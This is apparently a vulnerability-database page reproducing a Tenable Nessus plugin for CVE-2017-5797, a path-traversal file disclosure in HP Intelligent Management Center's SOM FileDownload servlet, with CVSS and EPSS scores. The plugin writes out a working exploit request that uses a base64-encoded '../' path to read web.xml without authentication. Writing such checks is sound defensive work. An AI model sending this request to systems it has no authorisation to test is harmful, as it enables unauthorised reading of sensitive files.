7.8 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:C/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.009 Low
EPSS
Percentile
82.8%
The HP Intelligent Management Center (IMC) application running on the remote host is affected by an information disclosure vulnerability in the included IMC Service Operation Management (SOM) module, specifically within the FileDownload servlet, due to improper validation of user-supplied input to the ‘filePath’ parameter. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to disclose the contents of arbitrary files on the system.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(99360);
script_version("1.6");
script_cvs_date("Date: 2019/11/13");
script_cve_id("CVE-2017-5797");
script_bugtraq_id(97214);
script_xref(name:"HP", value:"emr_na-hpesbhf03719en_us");
script_xref(name:"HP", value:"HPESBHF03719");
script_xref(name:"ZDI", value:"ZDI-17-192");
script_name(english:"HP Intelligent Management Center SOM Module filePath Information Disclosure");
script_summary(english:"Attempts to exploit an information disclosure vulnerability.");
script_set_attribute(attribute:"synopsis", value:
"A web application hosted on the remote web server is affected by an
information disclosure vulnerability.");
script_set_attribute(attribute:"description", value:
"The HP Intelligent Management Center (IMC) application running on the
remote host is affected by an information disclosure vulnerability in
the included IMC Service Operation Management (SOM) module,
specifically within the FileDownload servlet, due to improper
validation of user-supplied input to the 'filePath' parameter. An
unauthenticated, remote attacker can exploit this, via a specially
crafted request, to disclose the contents of arbitrary files on the
system.");
# https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03719en_us
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?90460b87");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-192/");
script_set_attribute(attribute:"solution", value:
"Upgrade the HP IMC SOM module to version 7.3 E0501 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/13");
script_set_attribute(attribute:"patch_publication_date", value:"2017/03/13");
script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:intelligent_management_center");
script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:imc_service_operation_management_software_module");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"Misc.");
script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("hp_imc_web_interface_detect.nbin");
script_require_keys("installed_sw/HP Intelligent Management Center Web Interface");
script_require_ports("Services/www", 8080);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");
include("data_protection.inc");
appname = 'HP Intelligent Management Center Web Interface';
get_install_count(app_name:appname, exit_if_zero:TRUE);
port = get_http_port(default:8080);
install = get_single_install(
app_name: appname,
port: port,
exit_if_unknown_ver:FALSE);
filename = base64(str:SCRIPT_NAME);
file = "web.xml";
filepath = base64(str:"../web/apps/servicedesk/WEB-INF/" + file);
exploit = '/servicedesk/servicedesk/fileDownload?OperType=2&fileName=' +
filename + '&filePath=' + filepath;
res = http_send_recv3(
port : port,
method : 'GET',
item : exploit,
exit_on_fail : TRUE
);
if ("iMC ServiceDesk Web Application" >!< res[2])
audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:'/'));
req = http_last_sent_request();
security_report_v4(
port : port,
severity : SECURITY_HOLE,
file : file,
request : make_list(req),
output : data_protection::sanitize_user_full_redaction(output:chomp(res[2])),
attach_type : 'text/plain'
);
Vendor | Product | Version | CPE |
---|---|---|---|
hp | intelligent_management_center | cpe:/a:hp:intelligent_management_center | |
hp | imc_service_operation_management_software_module | cpe:/a:hp:imc_service_operation_management_software_module |
7.8 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:C/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.009 Low
EPSS
Percentile
82.8%